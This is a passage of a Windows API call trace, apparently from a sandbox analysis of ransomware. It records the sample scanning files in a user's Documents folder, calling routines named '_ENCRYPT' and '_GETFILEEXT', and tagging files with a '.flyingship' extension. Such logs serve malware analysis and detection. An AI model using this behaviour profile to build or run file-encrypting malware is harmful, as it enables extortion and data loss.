lpNumberOfBytesRead=0x87f43c*=0x16f6, lpOverlapped=0x0) returned 1 [0177.679] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0177.679] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x16f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.679] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0177.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0177.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0177.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.flyingship.ots\r\n", cchWideChar=93, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0177.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5d) returned 0x9a5d78 [0177.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.flyingship.ots\r\n", cchWideChar=93, lpMultiByteStr=0x9a5d78, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.flyingship.ots\r\n", lpUsedDefaultChar=0x0) returned 93 [0177.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0177.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0177.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0177.680] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x5c, lpOverlapped=0x0) returned 1 [0177.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0177.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.680] CloseHandle (hObject=0x120) returned 1 [0177.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0177.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0177.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0177.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0177.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0177.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0177.683] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0177.683] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0177.684] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0177.684] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.684] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0177.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0177.684] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.685] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.686] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.686] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.688] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\f2lgxu.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0177.690] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.690] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.690] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.690] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0177.690] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.691] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.691] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0177.691] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.691] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0177.691] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.691] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0177.691] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0177.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.691] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.691] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.691] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.691] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd471860, ftCreationTime.dwHighDateTime=0x1d5e4c0, ftLastAccessTime.dwLowDateTime=0xe53b1530, ftLastAccessTime.dwHighDateTime=0x1d5e177, ftLastWriteTime.dwLowDateTime=0xe53b1530, ftLastWriteTime.dwHighDateTime=0x1d5e177, nFileSizeHigh=0x0, nFileSizeLow=0x15e3b, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="f2lgxu.rtf", cAlternateFileName="")) returned 0x90add8 [0177.693] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0177.693] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.693] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd471860, ftCreationTime.dwHighDateTime=0x1d5e4c0, ftLastAccessTime.dwLowDateTime=0xe53b1530, ftLastAccessTime.dwHighDateTime=0x1d5e177, ftLastWriteTime.dwLowDateTime=0xe53b1530, ftLastWriteTime.dwHighDateTime=0x1d5e177, nFileSizeHigh=0x0, nFileSizeLow=0x15e3b, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="f2lgxu.rtf", cAlternateFileName="")) returned 0x90add8 [0177.694] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0177.694] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", 